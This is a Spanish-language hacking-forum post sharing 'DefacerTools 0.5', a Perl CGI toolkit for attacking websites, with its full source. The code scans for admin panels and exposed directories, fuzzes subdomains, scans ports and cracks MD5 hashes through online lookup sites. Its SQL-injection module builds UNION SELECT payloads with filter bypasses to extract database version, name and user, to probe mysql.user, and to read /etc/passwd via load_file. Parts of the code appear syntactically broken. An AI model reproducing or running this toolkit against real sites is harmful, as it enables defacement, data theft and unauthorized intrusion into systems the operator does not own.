elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] DefacerTools 0.5 (regalo de navidad)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] DefacerTools 0.5 (regalo de navidad)  (Leído 1,831 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] DefacerTools 0.5 (regalo de navidad)
« en: 11 Diciembre 2011, 01:03 am »

Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que
soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.

Las funciones del programa son :

  • HexConverter
  • PanelFinder
  • PathsFinder
  • SQLi Scanner
  • FuzzDNS
  • FinderPass
  • PortScanner

El codigo del programa (formateado con perltidy) es

defacertools.cgi

Código
  1. #!"\xampp\perl\bin\perl.exe"
  2. #
  3. #DefacerTools 0.5
  4. #
  5. #(C) Doddy Hackman 2012
  6. #
  7. #
  8.  
  9. use CGI;
  10. use LWP::UserAgent;
  11. use URI::Split qw(uri_split);
  12. use HTML::LinkExtor;
  13. use IO::Socket;
  14.  
  15. @panels = (
  16.    'admin/admin.asp',               'admin/login.asp',
  17.    'admin/index.asp',               'admin/admin.aspx',
  18.    'admin/login.aspx',              'admin/index.aspx',
  19.    'admin/webmaster.asp',           'admin/webmaster.aspx',
  20.    'asp/admin/index.asp',           'asp/admin/index.aspx',
  21.    'asp/admin/admin.asp',           'asp/admin/admin.aspx',
  22.    'asp/admin/webmaster.asp',       'asp/admin/webmaster.aspx',
  23.    'admin/',                        'login.asp',
  24.    'login.aspx',                    'admin.asp',
  25.    'admin.aspx',                    'webmaster.aspx',
  26.    'webmaster.asp',                 'login/index.asp',
  27.    'login/index.aspx',              'login/login.asp',
  28.    'login/login.aspx',              'login/admin.asp',
  29.    'login/admin.aspx',              'administracion/index.asp',
  30.    'administracion/index.aspx',     'administracion/login.asp',
  31.    'administracion/login.aspx',     'administracion/webmaster.asp',
  32.    'administracion/webmaster.aspx', 'administracion/admin.asp',
  33.    'administracion/admin.aspx',     'php/admin/',
  34.    'admin/admin.php',               'admin/index.php',
  35.    'admin/login.php',               'admin/system.php',
  36.    'admin/ingresar.php',            'admin/administrador.php',
  37.    'admin/default.php',             'administracion/',
  38.    'administracion/index.php',      'administracion/login.php',
  39.    'administracion/ingresar.php',   'administracion/admin.php',
  40.    'administration/',               'administration/index.php',
  41.    'administration/login.php',      'administrator/index.php',
  42.    'administrator/login.php',       'administrator/system.php',
  43.    'system/',                       'system/login.php',
  44.    'admin.php',                     'login.php',
  45.    'administrador.php',             'administration.php',
  46.    'administrator.php',             'admin1.html',
  47.    'admin1.php',                    'admin2.php',
  48.    'admin2.html',                   'yonetim.php',
  49.    'yonetim.html',                  'yonetici.php',
  50.    'yonetici.html',                 'adm/',
  51.    'admin/account.php',             'admin/account.html',
  52.    'admin/index.html',              'admin/login.html',
  53.    'admin/home.php',                'admin/controlpanel.html',
  54.    'admin/controlpanel.php',        'admin.html',
  55.    'admin/cp.php',                  'admin/cp.html',
  56.    'cp.php',                        'cp.html',
  57.    'administrator/',                'administrator/index.html',
  58.    'administrator/login.html',      'administrator/account.html',
  59.    'administrator/account.php',     'administrator.html',
  60.    'login.html',                    'modelsearch/login.php',
  61.    'moderator.php',                 'moderator.html',
  62.    'moderator/login.php',           'moderator/login.html',
  63.    'moderator/admin.php',           'moderator/admin.html',
  64.    'moderator/',                    'account.php',
  65.    'account.html',                  'controlpanel/',
  66.    'controlpanel.php',              'controlpanel.html',
  67.    'admincontrol.php',              'admincontrol.html',
  68.    'adminpanel.php',                'adminpanel.html',
  69.    'admin1.asp',                    'admin2.asp',
  70.    'yonetim.asp',                   'yonetici.asp',
  71.    'admin/account.asp',             'admin/home.asp',
  72.    'admin/controlpanel.asp',        'admin/cp.asp',
  73.    'cp.asp',                        'administrator/index.asp',
  74.    'administrator/login.asp',       'administrator/account.asp',
  75.    'administrator.asp',             'modelsearch/login.asp',
  76.    'moderator.asp',                 'moderator/login.asp',
  77.    'moderator/admin.asp',           'account.asp',
  78.    'controlpanel.asp',              'admincontrol.asp',
  79.    'adminpanel.asp',                'fileadmin/',
  80.    'fileadmin.php',                 'fileadmin.asp',
  81.    'fileadmin.html',                'administration.html',
  82.    'sysadmin.php',                  'sysadmin.html',
  83.    'phpmyadmin/',                   'myadmin/',
  84.    'sysadmin.asp',                  'sysadmin/',
  85.    'ur-admin.asp',                  'ur-admin.php',
  86.    'ur-admin.html',                 'ur-admin/',
  87.    'Server.php',                    'Server.html',
  88.    'Server.asp',                    'Server/',
  89.    'wp-admin/',                     'administr8.php',
  90.    'administr8.html',               'administr8/',
  91.    'administr8.asp',                'webadmin/',
  92.    'webadmin.php',                  'webadmin.asp',
  93.    'webadmin.html',                 'administratie/',
  94.    'admins/',                       'admins.php',
  95.    'admins.asp',                    'admins.html',
  96.    'administrivia/',                'Database_Administration/',
  97.    'WebAdmin/',                     'useradmin/',
  98.    'sysadmins/',                    'admin1/',
  99.    'system-administration/',        'administrators/',
  100.    'pgadmin/',                      'directadmin/',
  101.    'staradmin/',                    'ServerAdministrator/',
  102.    'SysAdmin/',                     'administer/',
  103.    'LiveUser_Admin/',               'sys-admin/',
  104.    'typo3/',                        'panel/',
  105.    'cpanel/',                       'cPanel/',
  106.    'cpanel_file/',                  'platz_login/',
  107.    'rcLogin/',                      'blogindex/',
  108.    'formslogin/',                   'autologin/',
  109.    'support_login/',                'meta_login/',
  110.    'manuallogin/',                  'simpleLogin/',
  111.    'loginflat/',                    'utility_login/',
  112.    'showlogin/',                    'memlogin/',
  113.    'members/',                      'login-redirect/',
  114.    'sub-login/',                    'wp-login/',
  115.    'login1/',                       'dir-login/',
  116.    'login_db/',                     'xlogin/',
  117.    'smblogin/',                     'customer_login/',
  118.    'UserLogin/',                    'login-us/',
  119.    'acct_login/',                   'admin_area/',
  120.    'bigadmin/',                     'project-admins/',
  121.    'phppgadmin/',                   'pureadmin/',
  122.    'sql-admin/',                    'radmind/',
  123.    'openvpnadmin/',                 'wizmysqladmin/',
  124.    'vadmind/',                      'ezsqliteadmin/',
  125.    'hpwebjetadmin/',                'newsadmin/',
  126.    'adminpro/',                     'Lotus_Domino_Admin/',
  127.    'bbadmin/',                      'vmailadmin/',
  128.    'Indy_admin/',                   'ccp14admin/',
  129.    'irc-macadmin/',                 'banneradmin/',
  130.    'sshadmin/',                     'phpldapadmin/',
  131.    'macadmin/',                     'administratoraccounts/',
  132.    'admin4_account/',               'admin4_colon/',
  133.    'radmind-1/',                    'Super-Admin/',
  134.    'AdminTools/',                   'cmsadmin/',
  135.    'SysAdmin2/',                    'globes_admin/',
  136.    'cadmins/',                      'phpSQLiteAdmin/',
  137.    'navSiteAdmin/',                 'server_admin_small/',
  138.    'logo_sysadmin/',                'server/',
  139.    'database_administration/',      'power_user/',
  140.    'system_administration/',        'ss_vms_admin_sm/'
  141. );
  142.  
  143. my @dns = ('www');
  144.  
  145. #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
  146.  
  147. my $nave = LWP::UserAgent->new;
  148. $nave->agent(
  149. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  150. );
  151. $nave->timeout(5);
  152.  
  153. my %rta;
  154.  
  155. my $que  = new CGI;
  156. my @ques = $que->param;
  157.  
  158. for (@ques) {
  159.    $rta{$_} = $que->param($_);
  160. }
  161.  
  162. print "Content-type:text/html\n\n";
  163.  
  164. <style type=text/css>
  165.  
  166.  
  167. .main {
  168. margin : -287px 0px 0px -490px;
  169. border : White solid 1px;
  170. BORDER-COLOR: #00FF00;
  171. }
  172.  
  173. #pie {
  174. position: absolute;
  175. bottom: 0;
  176. }
  177.  
  178. body,a:link {
  179. font: normal 16px Verdana, Arial, Helvetica,
  180. sans-serif;
  181. background-color: #000000;
  182. color:#00FF00;
  183. Courier New;
  184. cursor:crosshair;
  185. font-size: small;
  186. }
  187.  
  188. input,table.outset,table.bord,table,textarea,select {
  189. background-color:black;color:#00FF00;
  190. border: solid 1px #00FF00;
  191. border-color:#00FF00
  192. }
  193.  
  194. a:link,a:visited,a:active {
  195. color: #00FF00;
  196. font: normal 16px Verdana, Arial, Helvetica,
  197. sans-serif;
  198. text-decoration: none;
  199. }
  200.  
  201. </style>";
  202.  
  203. if ( $rta{'hex'} ) {
  204.    logouno();
  205.    print
  206. qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>);
  207.    copyright();
  208. }
  209. elsif ( $rta{'textocode'} ) {
  210.    logouno();
  211.    print "[+] Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>";
  212.    print "</center>";
  213.    copyright();
  214. }
  215. elsif ( $rta{'panelfinder'} ) {
  216.    logodos();
  217.    print
  218. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>);
  219.    copyright();
  220. }
  221. elsif ( $rta{'buscarpanel'} ) {
  222.  
  223.    my $page = $rta{'buscarpanel'};
  224.    logodos();
  225.    print "<br>[+] Scanning $page<br><br>";
  226.    for $path (@panels) {
  227.        $code = tomax( $page . "/" . $path );
  228.        if ( $code->is_success ) {
  229.            print "[Link] : " . $page . "/" . $path . "<br>";
  230.        }
  231.    }
  232.    print "<br><br>[+] Finish<br>";
  233.    copyright();
  234. }
  235. elsif ( $rta{'pathsfinder'} ) {
  236.    logotres();
  237.    print
  238. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>);
  239.    copyright();
  240. }
  241. elsif ( $rta{'buscarpaths'} ) {
  242.    logotres();
  243.  
  244.    my $page = $rta{'buscarpaths'};
  245.  
  246.    my $code  = toma($page);
  247.    my @links = get_links($code);
  248.  
  249.    print "<br><br>[+] Finding paths<br><br>";
  250.  
  251.    for my $com (@links) {
  252.        my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  253.        if ( $path =~ /\/(.*)$/ ) {
  254.            my $path1 = $1;
  255.            $page =~ s/$path1//ig;
  256.            my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
  257.            if ( $path =~ /(.*)\// ) {
  258.                my $parche = $1;
  259.                unless ( $repetidos =~ /$parche/ ) {
  260.                    $repetidos .= " " . $parche;
  261.                    my $code = toma( "http://" . $auth . $parche );
  262.  
  263.                    if ( $code =~ /Index of (.*)</ig ) {
  264.                        my $dir_found = $1;
  265.                        chomp $dir_found;
  266.                        print "[+] Directory Found : $page/$dir_found<br>";
  267.                    }
  268.                }
  269.            }
  270.        }
  271.    }
  272.    print "<br><br>[+]Finished<br>";
  273.    copyright();
  274. }
  275. elsif ( $rta{'sqliscanner'} ) {
  276.    logocuatro();
  277.    print
  278. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>);
  279.    copyright();
  280. }
  281. elsif ( $rta{'buscarsql'} ) {
  282.    logocuatro();
  283.    print "<br><br>[+] Scanning page<br><br>";
  284.    &length( $rta{'buscarsql'} );
  285.    print "<br><br>[+] Finished";
  286.    copyright();
  287. }
  288. elsif ( $rta{'fuzzdns'} ) {
  289.    logocinco();
  290.    print
  291. qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>);
  292.    copyright();
  293. }
  294. elsif ( $rta{'buscardns'} ) {
  295.    logocinco();
  296.  
  297.    my $page = $rta{'buscardns'};
  298.  
  299.    print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>";
  300.    for my $path (@dns) {
  301.        $code = tomax( "http://" . $path . "." . $page );
  302.        if ( $code->is_success ) {
  303.            print "[+] Found : http://" . $path . "." . $page . "<br>";
  304.        }
  305.    }
  306.    print "<br><br>[+] Finished<br><br>";
  307.    copyright();
  308. }
  309. elsif ( $rta{'finderpass'} ) {
  310.    logoseis();
  311.    print
  312. qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>);
  313.    copyright();
  314. }
  315. elsif ( $rta{'buscarhash'} ) {
  316.    logoseis();
  317.    &crackit( $rta{'buscarhash'} );
  318.    copyright();
  319. }
  320. elsif ( $rta{'portscanner'} ) {
  321.    logosiete();
  322.    print
  323. qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>);
  324.    copyright();
  325. }
  326. elsif ( $rta{'buscarpuertos'} ) {
  327.    logosiete();
  328.    scanuno( $rta{'buscarpuertos'} );
  329.    copyright();
  330. }
  331. elsif ( $rta{'home'} ) {
  332.    sintax();
  333. }
  334. else {
  335.    sintax();
  336. }
  337.  
  338. sub sintax {
  339.    print qq(
  340. <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
  341. <br><br>
  342. <h1><center>DefacerTools</center></h1>
  343. <br><br>
  344. <center>
  345. <table border=1>
  346. <td class=main><center><b>Tools</b></center></td><tr>
  347. <td class=main><a href=?hex=true><center>HexConverter</center></a></td><tr>
  348. <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
  349. <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
  350. <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
  351. <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
  352. <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
  353. <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
  354. </table>
  355. </center>
  356. );
  357. }
  358.  
  359. sub logouno {
  360.    print qq(
  361. <center>
  362. <pre>
  363.  
  364.  
  365.  
  366. @    @                 @@@@                                        
  367. @    @                @    @                            @          
  368. @    @                @                                 @          
  369. @    @   @@@  @  @    @       @@@  @ @@  @   @  @@@  @@ @@  @@@  @@
  370. @@@@@@  @   @ @  @    @      @   @ @@  @ @   @ @   @ @  @  @   @ @
  371. @    @  @@@@@  @@     @      @   @ @   @  @ @  @@@@@ @  @  @@@@@ @
  372. @    @  @      @@     @      @   @ @   @  @ @  @     @  @  @     @
  373. @    @  @   @ @  @    @    @ @   @ @   @   @   @   @ @  @  @   @ @
  374. @    @   @@@  @  @     @@@@   @@@  @   @   @    @@@  @   @  @@@  @
  375.  
  376.  
  377.  
  378.  
  379. </pre>
  380.  
  381.  
  382. );
  383. }
  384.  
  385. sub logodos {
  386.    print qq(
  387. <center>
  388. <pre>
  389.  
  390.  
  391.  
  392. @@@@@                    @ @@@@@ @           @        
  393. @    @                   @ @                 @        
  394. @    @                   @ @                 @        
  395. @    @  @@@  @ @@   @@@  @ @     @ @ @@   @@@@  @@@  @@
  396. @@@@@      @ @@  @ @   @ @ @@@@  @ @@  @ @   @ @   @ @
  397. @       @@@@ @   @ @@@@@ @ @     @ @   @ @   @ @@@@@ @
  398. @      @   @ @   @ @     @ @     @ @   @ @   @ @     @
  399. @      @   @ @   @ @   @ @ @     @ @   @ @   @ @   @ @
  400. @       @@@@ @   @  @@@  @ @     @ @   @  @@@@  @@@  @
  401.  
  402.  
  403.  
  404.  
  405. </pre>
  406.  
  407.  
  408. );
  409. }
  410.  
  411. sub logotres {
  412.    print qq(
  413. <center>
  414. <pre>
  415.  
  416.  
  417.  
  418. @@@@@           @          @@@@@ @           @        
  419. @    @       @  @          @                 @        
  420. @    @       @  @          @                 @        
  421. @    @  @@@  @@ @ @@   @@  @     @ @ @@   @@@@  @@@  @@
  422. @@@@@      @ @  @@  @ @  @ @@@@  @ @@  @ @   @ @   @ @
  423. @       @@@@ @  @   @  @   @     @ @   @ @   @ @@@@@ @
  424. @      @   @ @  @   @   @  @     @ @   @ @   @ @     @
  425. @      @   @ @  @   @ @  @ @     @ @   @ @   @ @   @ @
  426. @       @@@@  @ @   @  @@  @     @ @   @  @@@@  @@@  @
  427.  
  428.  
  429.  
  430.  
  431.  
  432. </pre>
  433.  
  434.  
  435. );
  436. }
  437.  
  438. sub logocuatro {
  439.    print qq(
  440. <center>
  441. <pre>
  442.  
  443.  
  444.  
  445.  @@@    @@@@   @     @      @@@                                  
  446. @   @  @    @  @     @     @   @                                  
  447. @      @    @  @     @     @                                      
  448. @      @    @  @     @     @       @@@   @@@  @ @@  @ @@   @@@  @@
  449.  @@@   @    @  @     @      @@@   @   @     @ @@  @ @@  @ @   @ @
  450.     @  @    @  @     @         @  @      @@@@ @   @ @   @ @@@@@ @
  451.     @  @  @ @  @     @         @  @     @   @ @   @ @   @ @     @
  452. @   @  @   @@  @     @     @   @  @   @ @   @ @   @ @   @ @   @ @
  453.  @@@    @@@@   @@@@@ @      @@@    @@@   @@@@ @   @ @   @  @@@  @
  454.             @                                                    
  455.  
  456.  
  457.  
  458.  
  459.  
  460. </pre>
  461.  
  462.  
  463. );
  464. }
  465.  
  466. sub logocinco {
  467.    print qq(
  468. <center>
  469. <pre>
  470.  
  471.  
  472.  
  473. @@@@@                    @@@@    @    @   @@@
  474. @                        @   @   @@   @  @   @
  475. @                        @    @  @@   @  @    
  476. @     @   @ @@@@ @@@@    @    @  @ @  @  @    
  477. @@@@  @   @    @    @    @    @  @ @  @   @@@
  478. @     @   @   @    @     @    @  @  @ @      @
  479. @     @   @  @    @      @    @  @   @@      @
  480. @     @  @@ @    @       @   @   @   @@  @   @
  481. @      @@ @ @@@@ @@@@    @@@@    @    @   @@@
  482.  
  483.  
  484.  
  485.  
  486.  
  487.  
  488. </pre>
  489.  
  490.  
  491. );
  492. }
  493.  
  494. sub logoseis {
  495.    print qq(
  496. <center>
  497. <pre>
  498.  
  499.  
  500.  
  501. @@@@@ @           @          @@@@@                
  502. @                 @          @    @                
  503. @                 @          @    @                
  504. @     @ @ @@   @@@@  @@@  @@ @    @  @@@   @@   @@
  505. @@@@  @ @@  @ @   @ @   @ @  @@@@@      @ @  @ @  @
  506. @     @ @   @ @   @ @@@@@ @  @       @@@@  @    @  
  507. @     @ @   @ @   @ @     @  @      @   @   @    @
  508. @     @ @   @ @   @ @   @ @  @      @   @ @  @ @  @
  509. @     @ @   @  @@@@  @@@  @  @       @@@@  @@   @@
  510.  
  511.  
  512.  
  513.  
  514.  
  515.  
  516.  
  517. </pre>
  518.  
  519.  
  520. );
  521. }
  522.  
  523. sub logosiete {
  524.    print qq(
  525. <center>
  526. <pre>
  527.  
  528.  
  529.  
  530. @@@@@               @@@                                  
  531. @    @          @  @   @                                  
  532. @    @          @  @                                      
  533. @    @  @@@  @@ @@ @       @@@   @@@  @ @@  @ @@   @@@  @@
  534. @@@@@  @   @ @  @   @@@   @   @     @ @@  @ @@  @ @   @ @
  535. @      @   @ @  @      @  @      @@@@ @   @ @   @ @@@@@ @
  536. @      @   @ @  @      @  @     @   @ @   @ @   @ @     @
  537. @      @   @ @  @  @   @  @   @ @   @ @   @ @   @ @   @ @
  538. @       @@@  @   @  @@@    @@@   @@@@ @   @ @   @  @@@  @
  539.  
  540.  
  541.  
  542.  
  543.  
  544.  
  545.  
  546.  
  547. </pre>
  548.  
  549.  
  550. );
  551. }
  552.  
  553. sub copyright {
  554.    print
  555. qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>);
  556. }
  557.  
  558. sub length {
  559.    print "<br>[+] Looking for the number of columns<br><br>";
  560.    my $rows = "0";
  561.    my $asc;
  562.    my $page = $_[0];
  563.    ( $pass1, $pass2 ) = &bypass( $_[1] );
  564.  
  565.    $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
  566.    $total = "1";
  567.    for my $rows ( 2 .. 200 ) {
  568.        $asc .=
  569.          "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
  570.        $total .= "," . $rows;
  571.        $injection =
  572.            $page . "1"
  573.          . $pass1 . "and"
  574.          . $pass1 . "1=0"
  575.          . $pass1 . "union"
  576.          . $pass1
  577.          . "select"
  578.          . $pass1
  579.          . $alert
  580.          . $asc;
  581.        $test = toma($injection);
  582.        if ( $test =~ /RATSXPDOWN/ ) {
  583.            @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  584.            $control = 1;
  585.            my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  586.            my $save = $auth;
  587.            $total =~ s/$number[0]/hackman/;
  588.            print "[SQLI] : "
  589.              . $page . "1"
  590.              . $pass1 . "and"
  591.              . $pass1 . "1=0"
  592.              . $pass1 . "union"
  593.              . $pass1
  594.              . "select"
  595.              . $pass1
  596.              . $total . "<br>";
  597.            details(
  598.                $page . "1"
  599.                  . $pass1 . "and"
  600.                  . $pass1 . "1=0"
  601.                  . $pass1 . "union"
  602.                  . $pass1
  603.                  . "select"
  604.                  . $pass1
  605.                  . $total,
  606.                "--", ""
  607.            );
  608.        }
  609.    }
  610. }
  611.  
  612. sub details {
  613.    my ( $page, $bypass, $save ) = @_;
  614.    ( $pass1, $pass2 ) = &bypass($bypass);
  615.    if ( $page =~ /(.*)hackman(.*)/ig ) {
  616.        print "<br>[+] Searching information..<br><br>";
  617.        my ( $start, $end ) = ( $1, $2 );
  618.        $inforschema =
  619.            $start
  620.          . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  621.          . $end
  622.          . $pass1 . "from"
  623.          . $pass1
  624.          . "information_schema.tables"
  625.          . $pass2;
  626.        $mysqluser =
  627.            $start
  628.          . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  629.          . $end
  630.          . $pass1 . "from"
  631.          . $pass1
  632.          . "mysql.user"
  633.          . $pass2;
  634.        $test3 =
  635.          toma( $start
  636.              . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  637.              . $end
  638.              . $pass2 );
  639.        $test1 = toma($inforschema);
  640.        $test2 = toma($mysqluser);
  641.        if ( $test2 =~ /ERTOR854/ig ) {
  642.            print "[mysql.user] : ON<br>";
  643.        }
  644.        else {
  645.            print "[mysql.user] : OFF<br>";
  646.        }
  647.        if ( $test1 =~ /ERTOR854/ig ) {
  648.            print "[information_schema.tables] : ON<br>";
  649.        }
  650.        else {
  651.            print "[information_schema.tables] : OFF<br>";
  652.        }
  653.        if ( $test3 =~ /ERTOR854/ig ) {
  654.            print "[load_file] : ON<br>";
  655.        }
  656.        $concat =
  657. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  658.        $injection = $start . $concat . $end . $pass2;
  659.        $code      = toma($injection);
  660.        if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
  661.            print
  662. "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
  663.        }
  664.        else {
  665.            print "<br>[-] Not found any data<br>";
  666.        }
  667.    }
  668. }
  669.  
  670. sub encode {
  671.    my $string = $_[0];
  672.    $hex = '0x';
  673.    for ( split //, $string ) {
  674.        $hex .= sprintf "%x", ord;
  675.    }
  676.    return $hex;
  677. }
  678.  
  679. sub bypass {
  680.    if    ( $_[0] eq "/*" )  { return ( "/**/", "/**/" ); }
  681.    elsif ( $_[0] eq "%20" ) { return ( "%20",  "%00" ); }
  682.    else                     { return ( "+",    "--" ); }
  683. }
  684.  
  685. sub ascii {
  686.    return join ',', unpack "U*", $_[0];
  687. }
  688.  
  689. sub toma {
  690.    return $nave->get( $_[0] )->content;
  691. }
  692.  
  693. sub tomax {
  694.    return $nave->get( $_[0] );
  695. }
  696.  
  697. sub get_links {
  698.  
  699.    $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
  700.    return @links;
  701.  
  702.    sub agarrar {
  703.        my ( $a, %b ) = @_;
  704.        push( @links, values %b );
  705.    }
  706. }
  707.  
  708. sub crackit {
  709.  
  710.    my $secret = $_[0];
  711.  
  712.    print "<br><br>[+] Cracking $_[0]<br><br>";
  713.  
  714.    my %hash = (
  715.  
  716.        'http://passcracking.com/' => {
  717.            'tipo'      => 'post',
  718.            'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
  719.            'regex' =>
  720. '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
  721.        },
  722.        'http://md5.hashcracking.com/search.php?md5=' => {
  723.            'tipo'  => 'get',
  724.            'regex' => 'Cleartext of $_[0] is (.*)',
  725.        },
  726.        'http://www.bigtrapeze.com/md5/' => {
  727.            'tipo'      => 'post',
  728.            'variables' => '{"query" => $_[0], "submit" => " Crack "}',
  729.            'regex' =>
  730. 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
  731.        },
  732.        'http://opencrack.hashkiller.com/' => {
  733.            'tipo' => 'post',
  734.            'variables' =>
  735.              '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
  736.            'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
  737.        },
  738.        'http://www.hashchecker.com/index.php?_sls=search_hash' => {
  739.            'tipo'      => 'post',
  740.            'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
  741.            'regex' =>
  742. '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
  743.        },
  744.        'http://victorov.su/md5/?md5e=&md5d=' => {
  745.            'tipo'  => 'get',
  746.            'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
  747.        }
  748.    );
  749.  
  750.    for my $data ( keys %hash ) {
  751.  
  752.        if ( $hash{$data}{tipo} eq "get" ) {
  753.            $code = toma( $data . $_[0] );
  754.            if ( $code =~ /$hash{$data}{regex}/ig ) {
  755.                print "<br>[+] Decoded : " . $1 . "<br><br>";
  756.                print $secret. ":" . $1 . "<br>";
  757.            }
  758.        }
  759.        else {
  760.            $code = tomar( $data, $hash{$data}{variables} );
  761.            if ( $code =~ /$hash{$data}{regex}/ig ) {
  762.                print $secret. ":" . $1 . "<br>";
  763.            }
  764.        }
  765.    }
  766.    print "<br>[+] Finish<br>";
  767. }
  768.  
  769. sub tomar {
  770.    my ( $web, $var ) = @_;
  771.    return $nave->post( $web, [ %{$var} ] )->content;
  772. }
  773.  
  774. sub scanuno {
  775.  
  776.    my %ports = (
  777.        "21"   => "ftp",
  778.        "22"   => "ssh",
  779.        "25"   => "smtp",
  780.        "80"   => "http",
  781.        "110"  => "pop3",
  782.        "3306" => "mysql"
  783.    );
  784.  
  785.    print "<br>[+] Scanning $_[0]<br><br><br>";
  786.  
  787.    for my $port ( keys %ports ) {
  788.  
  789.        if (
  790.            new IO::Socket::INET(
  791.                PeerAddr => $_[0],
  792.                PeerPort => $port,
  793.                Proto    => "tcp",
  794.                Timeout  => 0.5
  795.            )
  796.          )
  797.        {
  798.            print "[Port] : "
  799.              . $port
  800.              . " [Service] : "
  801.              . $ports{$port} . "<br>";
  802.        }
  803.    }
  804.    print "<br><br>[+] Scan Finish<br>";
  805. }
  806.  
  807. # The End ?
  808.  
  809.  


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Regalo de navidad] Perfeccionando el ucListView :)
Programación Visual Basic
raul338 3 3,123 Último mensaje 26 Marzo 2011, 14:12 pm
por raul338
[Delphi] Project Spartacus 1.0 (Regalo de Navidad)
Programación General
BigBear 0 1,191 Último mensaje 25 Diciembre 2014, 16:19 pm
por BigBear
[Delphi] Project Arsenal X 0.2 (Regalo de navidad)
Programación General
BigBear 0 882 Último mensaje 25 Diciembre 2015, 18:52 pm
por BigBear
[C#] DH Player 1.2 (Regalo de navidad)
.NET (C#, VB.NET, ASP)
BigBear 0 804 Último mensaje 25 Diciembre 2016, 23:47 pm
por BigBear
El regalo de navidad que se convirtió en perro abandonado
Foro Libre
Machacador 3 539 Último mensaje 9 Diciembre 2019, 21:11 pm
por Tachikomaia
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines